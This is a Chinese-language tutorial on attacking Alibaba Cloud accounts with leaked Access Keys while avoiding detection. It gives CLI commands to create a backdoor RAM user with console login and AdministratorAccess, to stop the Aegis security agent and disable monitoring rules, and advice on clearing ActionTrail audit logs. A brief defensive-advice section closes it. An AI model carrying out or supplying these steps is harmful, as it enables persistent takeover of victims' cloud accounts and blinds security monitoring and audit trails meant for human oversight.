阿里云攻防避免检测的艺术 - 教学文档

前言

在云渗透测试中，最常见的攻击手法是通过获取Access Key和ID进行入侵。然而，直接使用公开工具进行操作往往会触发云平台的安全警告，导致攻击被快速发现和阻断。本文将详细介绍如何在不触发警告的情况下进行阿里云渗透测试。

工具与场景

CF云渗透工具简介

• 工具地址: https://wiki.teamssix.com/CF/
• 用途: 云环境利用框架，适用于:
  • 红队场景中对云上内网进行横向渗透
  • SRC场景中对Access Key影响程度评估
  • 企业自检云上资产安全

典型攻击流程

1. 获取有效的Access Key和ID
2. 使用CF工具配置凭证
3. 查看当前权限
4. 创建后门用户
5. 登录控制台进行进一步操作

问题发现

• 使用CF工具创建用户后会立即触发安全警告
• 管理员会收到紧急通知，导致攻击被发现和阻断

避免检测的技术方法

方法一：手工操作替代自动化工具

步骤1：基础配置

# 配置Access Key
export ALIBABA_CLOUD_ACCESS_KEY_ID="your_access_key_id"
export ALIBABA_CLOUD_ACCESS_KEY_SECRET="your_access_key_secret"

步骤2：创建用户

# 创建新用户
aliyun ram CreateUser --UserName backdoor_user

步骤3：分配登录权限

# 允许控制台登录
aliyun ram CreateLoginProfile --UserName backdoor_user --Password YourP@ssw0rd

步骤4：权限分配

# 列出所有策略
aliyun ram ListPolicies

# 为新建用户附加管理员权限
aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName backdoor_user

验证方法:

• 登录阿里云控制台检查用户列表
• 对比手工创建和工具创建的用户，手工创建的用户不会触发警告

方法二：关闭监控系统（仅限测试环境）

步骤1：停止云盾进程

# 查找云盾相关进程
ps -ef | grep aliyun-service

# 停止云盾服务
service aegis stop

步骤2：禁用监控功能

# 通过API关闭安全监控
aliyun cms DisableActiveMetricRule --RuleId your_rule_id

注意事项:

• 此方法仅适用于测试环境
• 生产环境中操作会被记录，可能导致账号异常

关键点总结

1. 自动化工具风险:

   • CF等公开工具容易被云平台识别
   • 工具特征明显，操作模式固定

2. 手工操作优势:

   • 行为更接近正常管理操作
   • 可以控制操作间隔，模拟真实管理员行为
   • 不会触发基于工具特征的检测规则

3. 权限管理技巧:

   • 先创建用户再分配权限，分步操作
   • 避免一次性完成所有敏感操作
   • 使用最小必要权限原则，而非直接分配管理员权限

4. 日志清理:

   • 操作完成后应清理API调用日志
   • 注意ActionTrail等审计服务的记录

防御建议

1. 监控异常API调用:

   • 特别关注CreateUser、AttachPolicy等敏感操作
   • 设置异地登录告警

2. 权限最小化:

   • 避免使用高权限的Access Key
   • 实施多因素认证

3. 定期审计:

   • 检查用户列表中的异常账户
   • 审查权限分配记录

4. 密钥保护:

   • 定期轮换Access Key
   • 避免在代码中硬编码密钥

通过以上方法，可以在渗透测试中有效避免被检测，同时也为防御方提供了相应的防护思路。